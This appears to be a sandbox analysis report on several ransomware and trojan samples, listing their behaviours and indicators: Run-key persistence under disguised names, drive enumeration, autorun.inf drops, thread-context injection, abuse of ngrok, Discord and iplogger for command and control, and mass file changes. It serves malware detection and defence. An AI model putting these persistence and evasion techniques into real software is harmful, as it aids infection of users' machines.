Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exechromet.exeDLL32.exereg.exeTrojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exeGoogle.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "C:\\Users\\Admin\\AppData\\Roaming\\csrss.exe" Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." chromet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e4a8dc8cd9d3a2e42914844f5688d1f = "\"C:\\Windows\\chromet.exe\" .." chromet.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." DLL32.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\COM_LOADER = "\\\\.\\F:\\Program Files\\PDF_Reader\\bin\\COM7.EXE" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServiceHelper = "C:\\Users\\Admin\\AppData\\Roaming\\ServiceHelper.exe" Trojan-Ransom.Win32.Blocker.kgxf-e086f62407490931accde542dd180b115374680ca7c3cee65e796cda8efecda0.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Google_Update = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleUpdate\\Google.exe" Google.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\ProgramData\\DLL32.exe\" .." DLL32.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe -
Drops desktop.ini file(s) 4 IoCs
Processes:
Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exedescription ioc Process File created C:\Windows\assembly\Desktop.ini Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe File opened for modification C:\Windows\assembly\Desktop.ini Trojan.MSIL.Crypt.hvhi-ed25de217ef133fcf5022402c79e4e50fd65455a40680292ea71b50cb8406c17.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\desktop.ini HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exedescription ioc Process File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\V: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\X: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\M: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\U: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\H: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\I: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\G: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\L: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\N: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\O: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\B: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\E: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\P: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\Q: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 16 IoCs
Processes:
flow ioc 75 2.tcp.ngrok.io 134 raw.githubusercontent.com 48 iplogger.org 54 iplogger.org 55 iplogger.org 56 iplogger.org 57 discord.com 58 discord.com 400 2.tcp.ngrok.io 151 2.tcp.ngrok.io 47 iplogger.org 53 iplogger.org 69 discord.com 135 raw.githubusercontent.com 46 iplogger.org 285 2.tcp.ngrok.io -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 149 freegeoip.app 150 freegeoip.app 41 api.my-ip.io 42 api.my-ip.io 68 api.my-ip.io 147 checkip.dyndns.org -
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
chromet.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exedescription ioc Process File created C:\autorun.inf chromet.exe File created D:\autorun.inf chromet.exe File created F:\autorun.inf chromet.exe File opened for modification F:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File opened for modification C:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe -
Drops file in System32 directory 7 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exesvchost32.exesvchost32.exedescription ioc Process File opened for modification C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File created C:\Windows\SysWOW64\notepad.exe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe File created C:\Windows\system32\services32.exe svchost32.exe File opened for modification C:\Windows\system32\services32.exe svchost32.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.exe svchost32.exe File created C:\Windows\system32\Microsoft\Telemetry\sihost32.log svchost32.exe File created C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe -
Suspicious use of SetThreadContext 7 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exeMServices.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeHEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeTrojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exedescription pid Process procid_target PID 2276 set thread context of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 432 set thread context of 4100 432 MServices.exe 146 PID 2020 set thread context of 5196 2020 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe 159 PID 5996 set thread context of 5064 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe 197 PID 3408 set thread context of 5632 3408 HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe 248 PID 532 set thread context of 5708 532 HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe 276 PID 6012 set thread context of 5820 6012 Trojan.MSIL.Crypt.hhej-89630c8b19c2db52f6504b2db7f0730ecd426dc008dad0f21ee3592c601ee410.exe 282 -
Processes:
resource yara_rule behavioral1/files/0x000a000000023b88-163.dat upx behavioral1/memory/2260-164-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/files/0x0007000000023c60-180.dat upx behavioral1/memory/2260-494-0x0000000000400000-0x00000000005BB000-memory.dmp upx behavioral1/memory/1636-495-0x0000000140000000-0x00000001400D8000-memory.dmp upx behavioral1/memory/1636-511-0x0000000140000000-0x00000001400D8000-memory.dmp upx behavioral1/memory/4500-674-0x0000000140000000-0x00000001400D8000-memory.dmp upx behavioral1/memory/5756-831-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/5464-856-0x0000000140000000-0x00000001400D8000-memory.dmp upx behavioral1/files/0x0007000000023d1f-878.dat upx behavioral1/memory/4020-887-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/5756-892-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/4640-908-0x0000000000400000-0x0000000000487000-memory.dmp upx behavioral1/memory/4640-951-0x0000000000400000-0x0000000000487000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exedescription ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp6-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\AppxBlockMap.xml.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\vfs\System\FM20.DLL.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-convert-l1-1-0.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.scale-125.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\WideTile.scale-125_contrast-white.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\ShareProvider_CopyFile24x24.scale-200.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp5-ppd.xrm-ms HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\fr\Microsoft.Build.Utilities.v3.5.resources.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\controllers.js HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-60_altform-colorize.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-24_altform-lightunplated.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-140.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL090.XML HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v8.1.dll.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\9.jpg HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\MixedRealityPortalAppList.targetsize-72_altform-unplated.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\MoveToFolderToastQuickAction.scale-80.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_MAKC2R-ul-oob.xrm-ms HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-96_altform-unplated.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\Square44x44\PaintAppList.targetsize-256.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\security\cacerts.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\FileAssociation\FileAssociation.targetsize-16.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-pl.xrm-ms HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-black\LargeTile.scale-125.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppPackageWideTile.scale-400_contrast-black.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Logos\contrast-high\AboutBoxLogo.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\StoreLogo.scale-100.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\AppIcon.targetsize-40_contrast-black.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\Licenses16\MondoVL_KMS_Client-ppd.xrm-ms.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_10.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxBlockMap.xml HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\24.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-100.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\EXCEL_COL.HXT HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Mozilla Firefox\osclientcerts.dll HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\SmallTile.scale-125_contrast-black.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomTracing_02.jpg HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-256.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\LargeTile.scale-125.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-20_altform-unplated.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\VBA\VBA7.1\VBEUIRES.DLL HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\WideTile.scale-200.png.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\174.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-100_kzf8qxf38zg5c\Assets\Images\SkypeTile.scale-100_contrast-white.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.targetsize-30_altform-lightunplated.png HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms.exe HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe File created C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-40_altform-unplated_contrast-white.png.exe 